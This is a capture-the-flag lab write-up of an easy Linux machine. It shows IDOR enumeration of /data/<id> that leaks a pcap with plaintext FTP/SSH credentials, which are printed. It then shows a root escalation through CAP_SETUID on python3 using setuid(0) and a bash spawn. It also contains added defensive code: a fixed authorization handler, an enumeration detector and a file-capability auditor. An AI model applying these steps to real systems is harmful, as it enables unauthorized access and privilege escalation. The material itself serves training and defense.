Machine IP = 10.10.10.245
OS = Linux
Level = Easy
NMAP
(initial scan)
I always start with nmap (nmap -F $IP)
Not shown: 97 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Three ports are open, OK let's start with FTP.
Anonymous login not available :(
So then move to HTTP (port 80).
http://10.10.10.245/
After some enumeration I found something interesting:
I downloaded the pcap file (id 23); nothing useful.
So I decided to change the value (23) <IDOR>
I changed the value 23 to 0.
Wow, /data/0 has some pcap data, so I downloaded it and read it via Wireshark.
It has FTP credentials,
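The bug behind that step is object-level authorization: /data/<id> is served by id alone. The following is an added example (not code from the Cap machine or its web application) that models the download handler with the IDOR beside an ownership-checked version, and adds a log-based detector for a client walking through capture ids. All names (Capture, CAPTURES, fetch_capture_*, find_idor_probes) and the log lines are constructed assumptions.

```python
# Added example (not from the original writeup or the target's code): a minimal
# model of a /data/<id> capture download, vulnerable and fixed, plus a detector
# for id enumeration in access logs. All names and sample data are constructed.
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Capture:
    id: int
    owner: str
    pcap: bytes


class NotFound(Exception):
    pass


# Constructed store: capture 0 belongs to nathan, capture 23 to the user who made it.
CAPTURES = {
    0: Capture(0, "nathan", b"\xd4\xc3\xb2\xa1 constructed pcap 0"),
    23: Capture(23, "guest", b"\xd4\xc3\xb2\xa1 constructed pcap 23"),
}


def fetch_capture_vulnerable(store, requesting_user, capture_id):
    """IDOR: the only check is that the id exists, so any logged-in user can
    read any capture just by changing the number in the URL."""
    cap = store.get(capture_id)
    if cap is None:
        raise NotFound(capture_id)
    return cap.pcap


def fetch_capture_fixed(store, requesting_user, capture_id):
    """Object-level authorization: resolve the object, then verify it belongs to
    the caller. Answering NotFound rather than Forbidden for foreign ids avoids
    confirming which ids exist."""
    cap = store.get(capture_id)
    if cap is None or cap.owner != requesting_user:
        raise NotFound(capture_id)
    return cap.pcap


def access_allowed(handler, store, user, capture_id):
    """True if the handler returns data, False if it refuses with NotFound."""
    try:
        handler(store, user, capture_id)
        return True
    except NotFound:
        return False


# Detection side: one client successfully pulling many distinct /data/<n> ids is
# the signature of this enumeration. Constructed common-log-format lines with an
# authenticated-user field.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"GET /data/(?P<id>\d+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def find_idor_probes(log_lines, threshold=3):
    """Return {client: sorted distinct ids} for clients that fetched at least
    `threshold` distinct capture ids with a 200 response."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("status") == "200":
            seen[m.group("client")].add(int(m.group("id")))
    return {c: sorted(ids) for c, ids in seen.items() if len(ids) >= threshold}


SAMPLE_LOG = [
    '10.10.14.5 - guest [26/Jun/2021:10:00:01 +0000] "GET /data/23 HTTP/1.1" 200 3120',
    '10.10.14.5 - guest [26/Jun/2021:10:00:09 +0000] "GET /data/0 HTTP/1.1" 200 8804',
    '10.10.14.5 - guest [26/Jun/2021:10:00:10 +0000] "GET /data/1 HTTP/1.1" 200 512',
    '10.10.14.5 - guest [26/Jun/2021:10:00:11 +0000] "GET /data/2 HTTP/1.1" 404 0',
    '10.10.14.9 - nathan [26/Jun/2021:10:05:00 +0000] "GET /data/0 HTTP/1.1" 200 8804',
]

if __name__ == "__main__":
    print("guest reads capture 0 (vulnerable):",
          access_allowed(fetch_capture_vulnerable, CAPTURES, "guest", 0))
    print("guest reads capture 0 (fixed):",
          access_allowed(fetch_capture_fixed, CAPTURES, "guest", 0))
    print("enumeration suspects:", find_idor_probes(SAMPLE_LOG))
```

The fixed handler keys the lookup on both the id and the session's user; the 404 line in the sample log is deliberately not counted, so the detector only reacts to ids that actually leaked data.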
and you can also use the strings command to view these creds:
strings 0.pcap
USER: nathan
PASSWORD: Buck3tH4TF0RM3!
Let's log in to FTP via these creds.
FTP has user.txt.
Let's try to log in via SSH with the same creds:
ssh nathan@10.10.10.245
Privilege Escalation
After running linpeas.sh
I found CAP_SETUID set on python3.
This means that it's possible to set the effective user id of the created process :)
Steps to Become Root
import os
os.setuid(0)            # 0 is root's uid, so the process becomes root
os.system("/bin/bash")  # spawn a shell with the new uid
Why setuid(0)?
Because root's uid is 0 (by default).
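From the defender's side, the finding above is caught by auditing file capabilities. The following is an added example (not part of the original writeup) that parses `getcap -r /` output, flags capabilities that are root-equivalent on their own, and calls out interpreters such as python3 specially, since any script they run inherits the grant. It accepts both the older `path = caps` and the newer libcap (2.41+) `path caps` line formats. The sample lines, the DANGEROUS set, and all function names are constructed assumptions.

```python
# Added example (not from the original writeup): audit `getcap -r / 2>/dev/null`
# output and flag file capabilities that can be turned into root, which is how
# CAP_SETUID on python3 is abused above. Handles both the older
# "/path = cap_x+ep" and the newer "/path cap_x=ep" line formats.
import os
import re
import subprocess
from dataclasses import dataclass

# Capabilities that on their own let a process become root or bypass file permissions
# (constructed list; extend to taste).
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner", "cap_setfcap",
}
INTERPRETERS = ("python", "perl", "ruby", "php", "node", "lua")

LINE_RE = re.compile(r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<caps>\S.*)$")
OP_RE = re.compile(r"([=+-])([eip]*)")


@dataclass(frozen=True)
class Finding:
    path: str
    cap: str      # capability name, or "all" when the clause grants every capability
    flags: str    # subset of e/i/p the clause grants
    reason: str


def parse_clause(clause):
    """Turn one cap_to_text clause ('cap_setuid+ep', 'cap_a,cap_b=ei', '=ep') into
    (names, granted_flags). '=' and '+' grant flags, '-' revokes them; an empty
    name list means the clause applies to all capabilities."""
    m = re.search(r"[=+-]", clause)
    if m is None:
        return [], ""
    names = [n for n in clause[:m.start()].split(",") if n]
    granted = set()
    for op, letters in OP_RE.findall(clause[m.start():]):
        if op == "-":
            granted -= set(letters)
        else:
            granted |= set(letters)
    return (names or ["all"]), "".join(sorted(granted))


def audit_getcap_output(text):
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        path, caps = m.group("path"), m.group("caps")
        for clause in caps.split():
            names, flags = parse_clause(clause)
            # Only effective or permitted bits are usable by the binary itself;
            # inheritable alone does nothing without a matching grant elsewhere.
            if "e" not in flags and "p" not in flags:
                continue
            for cap in names:
                if cap != "all" and cap not in DANGEROUS:
                    continue
                reason = "grants root-equivalent privilege"
                if any(i in os.path.basename(path) for i in INTERPRETERS):
                    reason = "interpreter: any script it runs inherits the capability"
                findings.append(Finding(path, cap, flags, reason))
    return findings


def remediation(path):
    """The fix for Cap-style findings: strip the file capability entirely."""
    return f"setcap -r {path}"


def run_audit():
    """Audit the local host (needs libcap's getcap on PATH)."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return audit_getcap_output(out)


# Constructed sample mixing both line formats; the python3.8 line mirrors the
# finding in the writeup above.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/backup_tool cap_dac_read_search=ep
/usr/bin/foo cap_setuid=i
/usr/local/bin/bar =ep
"""

if __name__ == "__main__":
    for f in audit_getcap_output(SAMPLE_GETCAP):
        print(f"{f.path}: {f.cap} ({f.flags}) {f.reason}; fix: {remediation(f.path)}")
```

ping and mtr-packet are left alone because cap_net_raw cannot be turned into root by itself, and foo is skipped because an inheritable-only bit is not usable by the binary; the all-capabilities grant on bar is reported even though no name appears in the clause.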
That's it :)
REFER
https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities